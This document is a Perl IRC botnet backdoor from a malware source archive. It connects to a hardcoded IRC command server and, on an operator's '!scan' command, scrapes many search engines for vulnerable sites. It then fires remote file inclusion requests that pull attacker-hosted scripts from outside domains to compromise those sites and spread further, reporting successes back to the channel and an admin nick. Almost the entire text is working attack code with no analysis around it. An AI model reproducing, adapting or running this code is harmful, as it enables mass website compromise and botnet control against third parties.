MalwareSourceCode/Perl/Backdoor.Perl.IRCBot.w
2020-10-09 21:59:39 -05:00

488 lines
15 KiB
OpenEdge ABL
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;
my $cmd = "http://www.wauze.de//language/lang_english/RuLeZ/me.txt?";
my $cmdprint = "http://www.wauze.de//language/lang_english/r.txt??";
my $nick = "UnIx|".(int(rand(99)));
my $ident = "xpl";
my $chan = "#r4k3t";
my $server = "211.21.73.10";
my $http = "Googlebot";
my $port = 6667;
my $sock;
my $proxy = 30;
my $admin = "SuPrEmO";
my $stringa = "!scan";
my $spread = "http://www.malteser-paderborn.de//contenido/includes/c.txt?";
my @User_Agent = &Agent();
my $pid = fork();
if($pid==0){
&irc($nick,$ident,$chan,$server,$port);
}else{
exit(0);
}
sub irc(){
my($nick,$ident,$chan,$server,$port)=@_;
$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$server",PeerPort=>$port);
$sock->autoflush(1);
print $sock "NICK ".$nick."\r\n";
print $sock "USER ".$ident." 8 * : By SISTEM\r\n";
print $sock "JOIN ".$chan."\r\n";
while( $cmdline = <$sock> ){
if ( $cmdline =~ /PRIVMSG $chan :$stringa\s+(.*?)\s+(.*)/ ) {
if(fork() == 0){
my($bug,$dork)=($1,$2);
&scan($bug,$dork);
exit(0);
}
}
if ($cmdline =~ /PRIVMSG $chan :!info/){
&privmsg($chan,"9[10Per scannare9]: 15$stringa bug dork");
}
if ($cmdline =~ /PRIVMSG $chan :!outbye/){
exit(0);
}
if($cmdline =~ /^PING \:(.*)/){
print $sock "PONG :$1";
}
}
}
sub scan(){
my($bug,$dork)=@_;
my $contatore = 0;
&privmsg($chan,"9[10Scansione Per9]: 5Bug:".$bug);
&privmsg($chan,"9[10Scansione Per9]: 6Dork:".$dork);
my @proc;
$proc[9] = fork();
if($proc[9] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Google4:".scalar(&Google($dork)));
exit;
}
$proc[1] = fork();
if($proc[1] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Yahoo4:".scalar(&Yahoo($dork)));
exit;
}
$proc[2] = fork();
if($proc[2] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Altavista4:".scalar(&Altavista($dork)));
exit;
}
$proc[3] = fork();
if($proc[3] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Lycos4:".scalar(&Gigablast($dork)));
exit;
}
$proc[4] = fork();
if($proc[4] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Msn4:".scalar(&Msn($dork)));
exit;
}
$proc[5] = fork();
if($proc[5] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Ilse.Nl4:".scalar(&Ask($dork)));
exit;
}
$proc[6] = fork();
if($proc[6] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Tiscali4:".scalar(&Fireball($dork)));
exit;
}
$proc[7] = fork();
if($proc[7] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Alltheweb4:".scalar(&Alltheweb($dork)));
exit;
}
$proc[8] = fork();
if($proc[8] == 0){
&privmsg($chan,"9[10Scansione Di9]: 6Aol4:".scalar(&Aol($dork)));
exit;
}
waitpid($proc[9],0);
waitpid($proc[1],0);
waitpid($proc[2],0);
waitpid($proc[3],0);
waitpid($proc[4],0);
waitpid($proc[5],0);
waitpid($proc[6],0);
waitpid($proc[7],0);
waitpid($proc[8],0);
my @links = &GetLink();
my @forks;
my $forked++;
&privmsg($chan,"9[10Ricerca9]: 15Totals Results:".scalar(@links));
my @uni = &Unici(@links);
&privmsg($chan,"9[10Ricerca9]: 15Cleaned:".scalar(@uni));
&Remove();
my $testx = scalar(@uni);
my $startx = 0;
foreach my $sito (@uni){
$contatore++;
my $link = "http://" . $sito . $bug . $cmd . "?";
my $link = "http://" . $sito . $bug . $spread . "?";
if($contatore %$proxy == 0){
my $start = 0;
foreach my $f(@forks){
waitpid($f,0);
$forks[$start--];
$start++;
}
$startx = 0;
}
$forks[$startx]=fork();
if($forks[$startx] == 0){
my $htmlsito = &Query($link,"3");
if($htmlsite =~ /JaheeM/ && $htmlsite =~ /uid=/){
&privmsg($chan,"9[4SAFE OFF9]: 8"."http://" . $sito . $bug . "3" . $cmdprint . "?");
&privmsg($admin,"9[4SAFE OFF9]: 8"."http://" . $sito . $bug . "3" . $cmdprint . "?");
&privmsg($admin,"9[4SPreAD9]: 8"."http://" . $sito . $bug . "4" . $spread . "?");
}
elsif($htmlsito =~ /JaheeM/){
&privmsg($chan,"9[11SAFE ON9]: 7"."http://" . $sito . $bug . "7" . $cmdprint . "?");
&privmsg($admin,"9[11SAFE ON9]: 7"."http://" . $sito . $bug . "7" . $cmdprint . "?");
&privmsg($admin,"9[11SpreaD9]: 7"."http://" . $sito . $bug . "4" . $spread . "?");
}
exit(0);
}
if($contatore %200 == 0){
&privmsg($chan,"9[10Ricerca9]: 7Scannati ".$contatore." di ".$testx);
}
$startx++;
}
my $start = 0;
foreach my $f(@forks){
waitpid($f,0);
$forks[$start--];
$start++;
}
&privmsg($chan,"9[10Ricerca4]:".$bug .$dork);
&privmsg($chan,"9[10Ricerca4]: 7Fine.");
}
sub privmsg(){
my ($cha,$cosi)=@_;
print $sock "PRIVMSG ".$cha." :".$cosi."\r\n";
}
sub Google(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my @dom = &GoogleDomains();
my $file = "google.txt";
my $html;
my @result;
foreach my $dominio (@dom){
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://www.google.".$dominio."/search?q=".$dork."&num=100&hl=de&cr=countryDE&start=".$start."&sa=N");
}
}
while($html =~ m/<h2 class=r><a href=\"http:\/\/(.+?)\"/g){
$1 =~ /google/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Yahoo(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my $file = "yahoo.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://search.yahooapis.com/WebSearchService/V1/webSearch?appid=SiteSearch&query=".$dork."&results=".$num."&start=".$start);
}
while($html =~ m/<Url>http:\/\/(.+?)\<\/Url>/g){
$1 =~ /yahoo/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Altavista(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my $file = "altavista.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://de.altavista.com/web/results?itag=ody&pg=aq&aqmode=s&aqa=".$dork."&aqp=&aqo=&aqn=&kgs=1&kls=1&filetype=&rc=dmn&swd=&lh=&nbq=50&stq=".$start);
}
while($html =~ m/<span class=ngrn>(.+?)\ <\/span>/g){
if($1 !~ /yahoo/ && $1 !~ /Altavista/){
push(@result,&Links($1,$file));
}
}
return(@result);
}
sub Gigablast(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $max=99;
my $file = "gigablast.txt";
my $html;
my @result;
for($start=1;$start < $max; $start += 1){
$html.=&Query("http://suche.lycos.de/cgi-bin/pursuit?pag=".$start."&query=".$dork."&SITE=de&cat=loc&enc=utf-8");
}
while($html =~ m/href=\"(.+?)\"/g){
push(@result,&Links($1,$file));
}
return(@result);
}
sub Msn(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=10;
my $max=100*10;
my $file = "msn.txt";
my $html;
my @result;
for($start=1;$start < $max; $start += $num){
$html.=&Query("http://search.live.com/results.aspx?q=".$dork."&lf=1&rf=1&first=".$start);
}
while($html =~ m/<a href=\"http:\/\/(.+?)\"/g){
$1 =~ /msn/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Ask(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=1;
my $max=100;
my $file = "ask.txt";
my $html;
my @result;
for($start=1;$start < $max; $start += $num){
$html.=&Query("http://search.ilse.nl/web?rid=PREV&pagnum=".$start."&search_for=".$dork);
}
while($html =~ m/\">(.+?)<\/a>/g){
$1 =~ /ask/ || push(@result,&Links($3,$file));
}
return(@result);
}
sub Fireball(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=1;
my $max=99;
my $file = "fireball.txt";
my $html;
my @result;
for($start=1;$start < $max; $start += $num){
$html.=&Query("http://search-dyn.tiscali.de/search.php?key=".$dork."&collection=de&tiscalitype=web&hits=10&language=de&maxCount=&collapse=on&spell=suggest&pg=".$start."&offset=".(($start-1)*10)."&xargs=");
}
while($html =~ m/onmouseover=\"window.status=\'http:\/\/(.+?)\'/g){
$1 =~ /tiscali/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Alltheweb(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=100;
my $max=100*10;
my $file = "alltheweb.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://www.alltheweb.com/search?advanced=1&cat=web&type=all&hits=".$num."&ocjp=1&q=".$dork."&o=".$start);
}
while($html =~ m/<span class=\"resURL\">http:\/\/(.+?)\ /g){
$1 =~ /alltheweb/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Aol(){
my($dork)=@_;
$dork=&Key($dork);
my $start;
my $num=1;
my $max=100;
my $file = "aol.txt";
my $html;
my @result;
for($start=0;$start < $max; $start += $num){
$html.=&Query("http://suche.aol.de/aol/search?query=".$dork."&page=".$start."&nt=SG2&langRestrict=2&q=".$dork."&rp=lang_de");
}
while($html =~ m/<p class=\"deleted\" property=\"f:url\">http:\/\/(.+?)\<\/p>/g){
$1 =~ /aol/ || push(@result,&Links($1,$file));
}
return(@result);
}
sub Query(){
my($link,$timeout)=@_;
my $req=HTTP::Request->new(GET=>$link);
my $ua=LWP::UserAgent->new();
$ua->agent($User_Agent[rand(scalar(@User_Agent))]);
$ua->timeout($timeout);
my $response=$ua->request($req);
return $response->content;
}
sub Key(){
my $chiave=$_[0];
$chiave =~ s/ /\+/g;
$chiave =~ s/:/\%3A/g;
$chiave =~ s/\//\%2F/g;
$chiave =~ s/&/\%26/g;
$chiave =~ s/\"/\%22/g;
$chiave =~ s/\\/\%5C/g;
$chiave =~ s/,/\%2C/g;
return $chiave;
}
sub GetLink(){
my @file = ("google.txt","yahoo.txt","altavista.txt","gigablast.txt","msn.txt","ask.txt","fireball.txt","alltheweb.txt","aol.txt");
my $link;
my @total;
foreach my $n (@file){
open(F,'<',$n);
while($link = <F>){
$link=~s/[\r\n]//g;
push(@total,$link);
}
close(F);
}
return(@total);
}
sub Remove(){
my @file = ("google.txt","yahoo.txt","altavista.txt","gigablast.txt","msn.txt","ask.txt","fireball.txt","alltheweb.txt","aol.txt");
foreach my $n (@file){
system("rm -rf ".$n);
}
}
sub Links(){
my ($link,$file_print) = @_;
my $host = $link;
my $host_dir = $host;
my @links;
$host_dir=~s/(.*)\/[^\/]*$/\1/;
$host=~s/([-a-zA-Z0-9\.]+)\/.*/$1/;
$host_dir=&End($host_dir);
$host=&End($host);
$link=&End($host);
push(@links,$link,$host,$host_dir);
open($file,'>>',$file_print);
print $file "$link\n$host_dir\n$host\n";
close($file);
return @links;
}
sub End(){
$stringa=$_[0];
$stringa.="/";
$stringa=~s/\/\//\//;
while($stringa=~/\/\//){
$stringa=~s/\/\//\//;
}
return($stringa);
}
sub Unici{
my @unici = ();
my %visti = ();
foreach my $elemento ( @_ ){
next if $visti{ $elemento }++;
push @unici, $elemento;
}
return @unici;
}
sub Agent(){
my @ret = (
"Microsoft Internet Explorer/4.0b1 (Windows 95)",
"Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)",
"Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)",
"Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)",
"Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)",
"Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)",
"Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Win32)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)",
"Microsoft Pocket Internet Explorer/0.6",
"Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)",
"MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)",
"Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)",
"Advanced Browser (http://www.avantbrowser.com)",
"Avant Browser (http://www.avantbrowser.com)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)",
"Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)",
"Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)",
"Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511",
"Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox",
"Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1",
"Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b",
"Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0",
"Mozilla/3.0 (OS/2; U)",
"Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)",
"Mozilla/4.61 (Macintosh; I; PPC)",
"Mozilla/4.61 [en] (OS/2; U)",
"Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)",
"Mozilla/4.8 [en] (Windows NT 5.0; U)" );
return(@ret);
}
sub GoogleDomains(){
my @dom = ("at","ch","de","fr","gr","nl","pt","co.uk","be");
return(@dom);
}